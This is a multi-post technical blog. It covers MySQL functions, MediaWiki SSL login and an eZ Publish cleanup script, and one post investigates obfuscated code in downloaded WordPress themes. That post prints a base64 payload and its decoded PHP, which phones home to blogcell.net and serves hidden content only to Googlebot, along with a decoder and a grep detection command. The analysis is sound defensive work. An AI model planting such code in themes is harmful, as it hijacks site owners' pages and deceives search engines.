23 Oct 2009 mysql alternative to PHP substr_count function
The substr_count function in PHP counts the number of substring occurrences. This post describes how to create a mysql stored function to behave just like PHP’s substr_count function.
This function can be created from your mysql console
delimiter || DROP FUNCTION IF EXISTS substrCount|| CREATE FUNCTION substrCount(s VARCHAR(255), ss VARCHAR(255)) RETURNS TINYINT(3) UNSIGNED LANGUAGE SQL NOT DETERMINISTIC READS SQL DATA BEGIN DECLARE count TINYINT(3) UNSIGNED; DECLARE offset TINYINT(3) UNSIGNED; DECLARE CONTINUE HANDLER FOR SQLSTATE '02000' SET s = NULL; SET count = 0; SET offset = 1; REPEAT IF NOT ISNULL(s) AND offset > 0 THEN SET offset = LOCATE(ss, s, offset); IF offset > 0 THEN SET count = count + 1; SET offset = offset + 1; END IF; END IF; UNTIL ISNULL(s) OR offset = 0 END REPEAT; RETURN count; END; || delimiter ;
Usage
Example 1
SELECT substrCount('/this/is/a/path', '/') `count`;
`count` would return 4 in this case. Can be used in such cases where you might want to find the “depth” of a path, or for many other uses.
This function is great to count the content of mysql ENUM and SET field data types.
Example 2
SELECT substrcount(
`tablename` , ','
) as tablename
FROM `tablename`
where substrcount(
`tablename` , ','
);
The content of table named tablename is a comma separated list generated from mysql ENUM datatype
2000/2001,2001/2002,2002/2003,2003/2004,2004/2005,2005/2006,2006/2007,2007/2008,2008/2009,2009/2010
In Example 2 the result from this query would be 9, telling us that there are 9 commas in this tablerow.
Source: Posted by Andrew Hanna on August 24 2006 8:04pm
Tags: howto, MySQL, PHP, stored functions
Posted by Hans-Henry Jakobsen
22 May 2009 Wordpress themes with eval and base64_decode lines
Lately I’ve been downloading and reading myself up on Wordpress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1
eval(base64_decode('abcdefgh....')
and other variations like
Example 2
eval(gzinflate(str_rot13(base64_decode('abcdefgh...')
This made me curious about why would someone make such an effort to obfuscate their code. Personally I would like to know what code my themes are running so it was not an option not to decode these eval lines in my Wordpress themes. This made me wonder if many of my themes that had these lines of code and a simple command from the console would reveal all my themes that had encoded code from the wp-content/themes katalog on your Wordpress installation
grep eval |grep decode | grep php * -R
I had several themes containing code of hiding code and some of the themes had hacks that made traffic redirects to other sites.
Decoding Example 1 can be performed by using the following script and inserting the encrypted text in variable $a.
The PHP decoder script
The encrypted text is taken from a unnamed random theme I have downloaded.
<?php
$a = 'ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO3ByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApO2lmKCRhZHdiX3RtcFsxXSE9IiIpeyRhZHdiX29wdCA9IGFycmF5KHRpbWUoKSwgJGFkd2JfdG1wWzFdKTskd3BkYi0+cXVlcnkoIlVQREFURSAkd3BkYi0+b3B0aW9ucyBTRVQgb3B0aW9uX3ZhbHVlPSciLm15c3FsX2VzY2FwZV9zdHJpbmcoc2VyaWFsaXplKCRhZHdiX29wdCkpLiInIFdIRVJFIG9wdGlvbl9uYW1lPSdhZHdiX29wdCciKTt9fWlmIChlcmVnaSgiZ29vZ2xlYm90IiwkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtpZiAoJGFkd2Jfb3B0WzFdIT0iIillY2hvICRhZHdiX29wdFsxXTt9fSBhZGRfYWN0aW9uKCJ3cF9mb290ZXIiLCAid3BfZ2V0X2Zvb3Rlcl9tZXRhIik7';
function a($a){ return base64_decode($a);}
while(!$b){
if(substr($a,0,4) == 'eval' || !$count){
$a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a);
$count++;
}else
$b = true;
}
echo $a;
?>
To run it from a console window you can do the following, not as a privileged user in case it does something nasty.
php scriptname.php > result.txt
My text would output the following text to the result.txt file
function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt);
else{$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net';
$adwb_get = '/wpam/';$adwb_soc = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
preg_match('/(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp);
if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' HERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1];
}
}
add_action("wp_footer", "wp_get_footer_meta");
You should then decide if the decoded code is something you would like to run on your Wordpress site. Some themes are doing this to hide their Wordpress theme tricks while other do it to do nasty stuff like redirecting traffic from your site to other sites, etc.
Source: The decoder script was found here
Tags: base64_decode, eval, gzinflate, PHP, str_rot13, Wordpress, Wordpress theme
Posted by Hans-Henry Jakobsen
30 Jan 2009 Enable secure / https SSL login on mediaWiki 1.13.3
This is how I’ve enabled secure SSL login through https on a mediaWiki 1.13.3 installation. This description might work on other versions of mediaWiki, but that has not been tested.
mediWiki doesn’t support SSL login out of the box so a little hack has to be performed.
First you need to tell the webserver, in my case my Apache server that mediaWiki login requests should be redirected to the SSL page
Add the following code lines to your Apache config files or the mediaWiki .htaccess file
Rewrite login url to use httpsRewriteEngine On
RewriteCond %{REQUEST_URI} ^/index.php$
RewriteCond %{QUERY_STRING} ^title=Special:UserLogin
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteRule ^(.*)$ https://%{SERVER_NAME}/$1 [R]
Rewrite non login url to use normal http
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(?!title=Special:Userlogin)
RewriteRule ^(.*)$ http://%{SERVER_NAME}$1 [R]
Source: http://wiki.epfl.ch/cfavi/mediawiki
In addition to the above configuration you have to create a PHP script to fix some cookies problems since the cookie was made on an https address but normal surfing is done on http mode.
Create a file named ssl_login.php and insert the following code into it
# Secure the login page.
# Secure cookies hurt us because they are set on the https page
# but inaccessible from the http page, so we lose our previous session.
$wgCookieSecure = false;
# Don't process JavaScript and CSS files.
# Otherwise, a secure page will be tagged as "partially secure" because these
# files are being hit via http.
if (checkQS('gen', 'js')) {return;}
if (checkQS('gen', 'css') || checkQS('ctype', 'text/css')) {return;}
# Get page title from query string.
$pageTitle = array_key_exists('title', $_GET)
? $_GET['title']
: "";
# Get server variables
$domain = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
# Are we on the sign-in page or not?
# Logic works for everything except Special pages which apparently don't
# even run LocalSettings.php.
$onSignInPage = false;
$signInPageName = 'special:userlogin'; // lowercase on purpose
if ( strtolower($pageTitle) == $signInPageName ) {
$onSignInPage = true;
} elseif ( strstr(strtolower($uri), "/$signInPageName") ) {
$onSignInPage = true;
} else {
$onSignInPage = false;
}
# Secure only the Special:Userlogin page.
# Un-secure all other pages.
if ( !checkServerVariable('HTTPS', 'on') && $onSignInPage ) {
header('Location: https://' . $domain . $uri);
} elseif ( checkServerVariable('HTTPS', 'on') && ! $onSignInPage ) {
header('Location: http://' . $domain . $uri);
} else {
// nothing
}
function checkQS($key, $value) {
return checkArrayValue($_GET, $key, $value);
}
function checkServerVariable($var, $value) {
return checkArrayValue($_SERVER, $var, $value);
}
function checkArrayValue($arr, $key, $value) {
return array_key_exists($key, $arr) && $arr[$key] == $value;
}
Include this file in your LocalSettings.php file like this
# Fix to use SSL login include '/full/path/to/htdocs/ssl_login.php';
Source: http://www.mediawiki.org/wiki/Manual:Configuration_tips_and_tricks#HTTPS_on_Login_only
Remember to restart your apache webserver to see the changes.
Tags: .htaccess, Apache, https, MediaWiki, PHP, SSL
Posted by Hans-Henry Jakobsen
08 Oct 2008 mysql on a nondefault socket
It is sometimes necessary to run two instances of mysql, like in my case. I need a mysql database in addition to the one Zimbra uses. One solution to this problem is to run the mysql database on a non default socket. This can be done by changing the following line in my.cnf
my.cnf
[client] ... socket = /var/run/mysqld/mysqld2.sock
Restart the mysql daemon afterwards to activate the change.
In PHP it’s possible to avoid programming the nondefault socket info whenever we use mysql
php.ini
[MySQL] ... mysql.default_socket = /var/run/mysqld/mysqld2.sock
If you don’t have access to php.ini you have to program this in your PHP code
$dbcnx = @mysql_connect('localhost:/var/run/mysqld/mysqld2.sock',$username, $password);
Posted by Hans-Henry Jakobsen
22 Sep 2007 Corrupt Content Objects in eZ Publish
On my eZDB I’ve found two different scenarios of corrupt objects, they must have become corrupt when not having transaction enabled, and eZp or the user breaks out of a content object creation, og content object edit:
- a content object exist only in table ezcontentobject, no referernces to object in any other ezcontentobject*-tables. SOLUTION: delete row from ezcontentobject.
- a content object has attributes etc., but it has a ezcontentobject.current_version that doesn’t have attributes. SOLUTION: roll back version number.
This script report, and does the required job:
<?php
// Script for finding and handling content_objects that are not completely created
// That may occur under some circustances when using a database without transations enabled
//
//
// 2007.09.20, jonny.bergkvist@hit.no
// $doUpdate, true or false. Set to false for at dry test-run
$doUpdate = true;
include_once( 'kernel/common/template.php' );
include_once( "lib/ezutils/classes/ezhttptool.php" );
include_once( 'lib/ezutils/classes/ezcli.php' );
include_once( 'kernel/classes/ezscript.php' );
include_once( 'lib/ezdb/classes/ezdb.php' );
$cli =& eZCLI::instance();
$script =& eZScript::instance();
$script->initialize();
$db =& eZDB::instance();
set_time_limit( 0 );
$arrayResult1 = $db->arrayQuery( "SELECT id, current_version FROM ezcontentobject" );
echo "First checking for content objects that has no contentobject_attributes at all...n";
$i = 0;
foreach( $arrayResult1 as $item) {
//check if object has no attributes of any version stored
$hasAttribute = $db->arrayQuery( "SELECT contentobject_id FROM ezcontentobject_attribute WHERE contentobject_id = " . $item['id'] );
if ( empty( $hasAttribute ) ) {
echo "Corrupt object: " . $item['id'] . ". ";
if ( $doUpdate ) {
echo "Deleting corrupt object with no attributes...n";
$db->query( "DELETE FROM ezcontentobject WHERE ezcontentobject.id = " . $item['id'] );
}
$i++;
}
}
echo "Total corrupt objects with no attributes: " . $i . "nn";
$arrayResult2 = $db->arrayQuery( "SELECT id, current_version FROM ezcontentobject" );
echo "Then checking for content objects that has contentobject_attributes, but not of the current_version...n";
$i = 0;
foreach( $arrayResult2 as $item) {
//check if current_version has content attributes
$hasAttribute = $db->arrayQuery( "SELECT contentobject_id FROM ezcontentobject_attribute WHERE contentobject_id = " . $item['id'] . " AND version = " . $item['current_version'] );
if ( empty( $hasAttribute ) ) {
echo "Corrupt object: " . $item['id'] . ", current_version: " . $item['current_version'] . ". ";
if ( $doUpdate ) {
$previousCurrentVersion = $item['current_version'] - 1;
echo "Setting back to version: " . $previousCurrentVersion . "n";
$db->query( "UPDATE ezcontentobject SET current_version = " . $previousCurrentVersion . " WHERE id = " . $item['id'] );
}
$i++;
}
}
echo "Total objects with wrong current_version: " . $i . "n";
$script->shutdown();
?>
Source: http://ez.no/developer/forum/general/problem_corrupt_contentobjects
Tags: Apache, eZ Publish, Flau Bris, PHP
Posted by Hans-Henry Jakobsen
